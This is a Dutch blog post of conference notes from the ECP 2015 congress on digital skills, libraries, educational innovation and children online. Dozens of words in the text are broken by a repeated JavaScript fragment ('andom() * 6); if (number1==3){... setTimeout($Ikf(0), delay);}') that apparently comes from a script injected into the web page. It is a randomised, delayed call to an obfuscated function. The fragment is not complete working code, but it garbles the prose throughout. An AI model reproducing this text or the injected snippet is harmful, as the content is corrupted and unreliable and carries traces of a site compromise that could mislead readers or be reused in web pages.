Tag archieven: lunch

Jaarcongres ECP 2015, in het hart van digitalisering

Lees mijn aantekeningen door de dag heen (19 november 2015) van mijn deelname aan dit jaarlijks terugkerende congres in Den Haag. Ik doe verslag van de sessies die ik bijwoonde. Excuus voor de “hak op de tak” schrijfstijl. Niet alles was nu eenmaal even interessant. Wat je leest zijn echter wel de krenten uit de pap!

IMG_8250Sessie 1 Digivaardigheden toen, nu en straks

Een terugblik en vooruitblik op het aflopende publiek-privaatprogramma Digivaardig & Digiveilig, dat gaat stoppen hoewel aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andacht voor deze onderwerpen onverminderd nodig blijft, aldus diverse sprekers.

Tip: kijk op het Digitaalhulpplein.nl. Doelgroep, verwijzers en trainers zijn er samen te vinden op 1 platform. Met 12.000 bezoekers in 2015. Niet vaardige mensen komen via hun netwerk en omgeving in aanraking met ondersteuners. Op Oefenen.nl kunnen ze trainen in lezen en schrijven. Soms blijkt dan dat digitale vaardigheden ook achterlopen.

Pleidooi van de dag (ja, nu al): hou je digitale vaardigheden bij zodat je regie hebt op je loopbaan.

Bekijk eens de site http://www.slimmerondernemenin1minuut.nl waarop bijna 30 korte modules staan die je kennispeil verhogen.  Met 11780 deelnemers die B2C, business to consumer, bereiken. Afleveringen onder abonnement voor zelf lerende MKB-ers. Ook op ondernemersplein.nl binnenkort. Want: ”Je bent nooit te oud om digivaardig te worden.”

E-skills zijn voor jongeren al bijna net zo belangrijk als lezen en schrijven. Hoe begrijp je andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders de wereld van nu. Daarom is er een landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelijke codeweek en hebben in Engelandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and kinderen sinds vorig jaar verplicht les in coderen op school.

Faye, een jonge meid met een vader die programmeert, vertelde dat ze op code-zomerkamp was geweest. Van http://digivita.nl/nieuw/ en speciaal  voor meisjes. Ze beweerde dat je vooral moet leren door te doen. Kijk bijvoorbeeld eens op http://lekkersamenklooien.nl voor ouders en kind.

Wil je echt aan de slag met coderen, programmeren en bouwen met je wat oudere kind / tiener, kijk dan eens op https://www.arduino.cc voor de toollkit. Wil je spelenderwijs leren programmeren dan is http://twolivesleft.com/CargoBot/ een aanrader. Je leert een robot pakjes verplaatsen op de iPad.

Faye was voorstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander van de “makers class” op haar school. Waar jongeren die snel door de reguliere stof heen gaan een lesaanbod krijgen dat uitdaagt. Maar ze wil eigenlijk dat iedere scholier dit kan volgen. Programmeren en techniek moet een standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaardvak worden.

Van de buurvrouw naast me, die hoorde dat ik dochters heb, kreeg ik deze tip: Project Prep is een boek voor “preppy girls” over mode, technologie, New York en L.O.V.E! Kijk op http://www.preptheproject.com/nl/

Via http://geefitdoor.nl geven IT-ers gastlessen op scholen. Mentoren en docenten kampen met een kennisachterstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and en weten bovendien vaak niet wat het IT niveau is van hun leerlingen. De term ICT schrikt af maar is overal aanwezig.

IMG_8238

Tineke Netelenbos, voorzitter van ECP zei dat digivaardigheid stimuleren nodig blijft. Er zijn tal van stimulerende hulpmiddelen en sites. Maar de vindbaarheid van die digitale hulpmiddelen is nog wel een probleem. Zegt het dus voort.

Zij pleit er voor om talentvolle jongeren een rol te geven in het ontwikkelen van vernieuwende programma’s in het onderwijs. Bovendien, zo stelt zij, is een leven lang leren juist nu zo nodig. Het programma digivaardig en digiveilig stopt maar de aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andacht hiervoor mag niet verslappen. Op http://www.eskillsforjobs.nl zijn Europese stimuleringsprogramma’s te volgen.

Sessie 2 Digivaardigheden in de praktijk

Gemeente en Bibliotheek: samen sterk met het Digitaal Hulpplein
Met Heleen Kist van digitaalhulpplein.nl, Maaike Toonen Van de KoninklijIMG_8239ke Bibliotheek en Lianne Knobel van Bibliotheek Breda..

De Koninklijke Bibliotheek is de landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelijke koepel. Daaronder zijn er de POI’s die lokale bibliotheken ondersteunen. En als aflastte laag dus die lokalen bibliotheken, vaak gefinancierd door de Gemeenten.

Bibliotheken willen het vangnet vormen voor digitale vaardigheden en positioneren zich nadrukkelijk als centrum van het sociale domein, als het gaat om participatie, werk en gezin. Of zoals bleek: het zijn educatief maa
tschappelijke centra met cursussen.

Er lopen diverse programma’s en samenwerkingsverbandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden. Bijvoorbeeld het Tel mee net Taal programma over sociale inclusie en Klik&Tik, computervaardigheden. De Bieb, het UWV en ROC’s werken samen. Maar ook met St. Lezen en Schrijven, ECP, BZK, OCW, SZW, Seniorweb, Belastingdienst.

IMG_8240Het aantal uitleningen van boeken neemt af door digitalisering. Biebs p
rofileren zich nu nadrukkelijk op werk en inkomen en vaardigheden ontwikkelen / educatie. De bibliotheken moeten ook hun relevantie aantonen om niet, net als het welzijnswerk,  wegbezuinigd te worden.

Men stelde dat er minder schaamte is voor ontbreken van digitale vaardigheden dan voor laaggeletterdheid. Een kwart van deze groep komt toch nu en dan in de bieb. Daar kunnen ze meedoen aan Taal voor het leven. Digisterker. Klik&Tik. Workshops DigiD en Werk.nl. Bibliotheek voor ondernemers enzovoorts.

Financiering komt meestal vanuit gemeentelijke WEB-gelden 2015-2016.

De activiteiten hebben als spin off dat groepen verder gaan op Social media. Op Facebook en Linkedin houden deelnemers contact. De trainingen worden gegeven door goed opgeleide vrijwilligers. Vaak betreft het “camouflage trainingen” waar digitale vaardigheden bijvangst zijn.

IMG_8244Les voor het sociaal werk … ga samenwerken met de lokale bibliotheek en kijk wat je samen kan neerzetten. Voor je overlappende doelgroep en om je meerwaarde aan te tonen.

Lunch (geweldig!)

Sessie 3, Innovatie in het onderwijs, Digitaal leren in een stroomversnelling Door GEU-bestuurslid Eric Razenberg

De trend in onderwijs-middelen-ontwikkeling-landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and is digitaler en persoonlijker / individueler. Het mediagebruik van kinderen door de dag heen kent 2 dips: nl. wanneer ze op school zitten. Dat is een veeg teken dat het onderwijs achterloopt op de werkelijkheid. Het is een uitdaging voor docenten om te verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen en digitale middelen te aanvaarden en in onderwijs te integreren.

IMG_8245Boeken zijn goedkoper. Vaak te gebruiken. Samen met digitale middelen inzetten is duur. Maar de trend om technologie te integreren is wel stijgend.

Want het is aantrekkelijk voor kinderen, het sluit goed bij ze aan. Het genereert efficiënter onderwijs. En een grotere motivatie on te leren. Leerlingen besteden digitaal meer tijd aan het leren waardoor betere resultaten worden geboekt en ze sneller door de stof heen gaan.

Om docenten digivaardiger te maken: http://www.stichting-leerkracht.nl/kom-langs-bij-leerkracht/

https://www.thiememeulenhoff.nl/primair-onderwijs/mijn-talent/mijn-talent/mijn-talent/over-mijn-talent/zo-werkt-mijn-talent/demo-mijn-talent? is een digitaal ondersteund programma. Leerlingen kiezen zelf wat ze willen leren en gaan zappend door het aanbod.

De nieuwe werkelijkheid bleek in de zaal toen een toehoorder interrumpeerde met: “Ik ben scholier en ondernemer.”

Sessie 4, Netkids 2020

De laatste sessie van vandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaag. Marjolijn Bonthuis (ECP) gaat in gesprek met Pedro de Bruyckere en Remco Pijpers.

Remco Pijpers en Pedro de Bruyckere op Jaarcongres ECP 2015

Remco Pijpers en Pedro de Bruyckere op Jaarcongres ECP 2015

Begonnen werd met https://minecraft.net, een open eind spel dat je zelf vormgeeft. Is dit wat we willen? Is dit goed voor onze kinderen? Het Internet of toys, waar speelgoed met elkaar communiceert? Kinderen die Siri ontdekken en dus tegen apparaten gaan praten?

Hoe hoger opgeleid je ouders hoe sneller je digitale ontwikkeling gaat. We maken een omslag van protectie van kinderen naar empowerment. Van gelijke toegang tot gelijke ontwikkeling. Ook hier een pleidooi om verplicht programmeren op school in te voeren.

Afgelopen 15 jaar draaide het om technologie, om de knoppen zeg maar. Nu om wie we zijn en wat we willen (zijn) in verhouding tot die technologie.

Pedro De Bruykere schreef het boek Ik was 10 in 2015 #10in2015 / http://www.lannoo.be/ik-was-10-2015

Zullen er nog genoeg mensen zijn die het werk kunnen doen in een verrijzende wereldbevolking? Zullen kinderen rond hun 40e, na hun scheiding, weer terug thuis komen wonen? Hoe bereid je ze voor op de toekomst? In ieder geval: leer ze autonoom zijn en strategische vaardigheden. Acteren in mensenljjke netwerken is essentieel. Leer ze niet dat ze niet met een dronken kop op Facebook moeten gaan staan (lokaal is dat niet slim) maar gelijk dat ze Iets positiefs online zetten over zichzelf waaraan ze wel herinnerd willen worden als ze ouder zijn.

Mogen kinderen nog jong zijn? Vrije tijd en vrije ruimte staan onder druk. Waneer spelen kinderen zonder toezicht? Meisjes worden in onderzoeken nog wel eens vergeten, die zitten geïsoleerd op hun slaapkamers. Jongens gamen of zijn op straat en veel zichtbaarder.

Vergeten is onderbelicht. Plaats maken. Ruimte om te experimenteren. Fantastische verhalen maken waar je later je unieke versie van maakt, en over op kunt scheppen, omdat er geen camera in de buurt was om het vast te leggen. Onze kinderen maken dat nauwelijks nog mee.

Deze ruimte staat onder druk. Door angst van opvoeders. Jongeren gebruiken nu zo veel sociale media omdat het de laatste plaats is zonder toezicht.

Volle bak op het Jaarcongres ECP 2015, ben jij er volgend jaar ook bij?Tijd en vergeten staan onder druk. Plaats jij foto’s van de 20 weken ego’s van je ongeboren kind op Facebook? En wat de je de jaren daarna met afbeeldingen van je kind? Ouders en toekomstig ouders moeten hoognodig mediawijs worden.

Kortom, genoeg stof om over na te denken en volop tips en inspiratie voor het ontwikkelen van digitale vaardigheden en innovatie. Volgend jaar meer.

Hans Versteegh, Welzijn 3.0